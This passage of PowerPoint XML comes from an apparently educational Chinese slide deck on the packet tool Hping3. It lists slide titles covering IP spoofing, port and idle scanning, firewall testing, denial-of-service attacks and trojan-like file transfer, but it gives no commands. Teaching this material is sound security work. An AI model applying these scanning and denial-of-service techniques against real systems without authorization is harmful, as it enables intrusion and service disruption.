              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时间戳选项来猜测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HZ/uptime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7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2235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IP地址欺骗扫描工具Hping3</vt:lpstr>
      <vt:lpstr>Hping3安装</vt:lpstr>
      <vt:lpstr>Hping3基本用法</vt:lpstr>
      <vt:lpstr>使用方法</vt:lpstr>
      <vt:lpstr>模式选择</vt:lpstr>
      <vt:lpstr>IP 模式</vt:lpstr>
      <vt:lpstr>ICMP 模式</vt:lpstr>
      <vt:lpstr>UDP/TCP 模式</vt:lpstr>
      <vt:lpstr>UDP/TCP 模式</vt:lpstr>
      <vt:lpstr>Common //通用设置</vt:lpstr>
      <vt:lpstr>Hping3典型功能应用</vt:lpstr>
      <vt:lpstr>防火墙测试</vt:lpstr>
      <vt:lpstr>端口扫描</vt:lpstr>
      <vt:lpstr>Idle扫描</vt:lpstr>
      <vt:lpstr>拒绝服务攻击</vt:lpstr>
      <vt:lpstr>文件传输</vt:lpstr>
      <vt:lpstr>木马功能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IP地址欺骗扫描工具Hping3</dc:title>
  <dc:creator>茹 兴奥</dc:creator>
  <cp:lastModifiedBy>茹 兴奥</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-05T02:22:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-05T10:30:02Z</dcterms:modified>
</cp:coreProperties>
</file>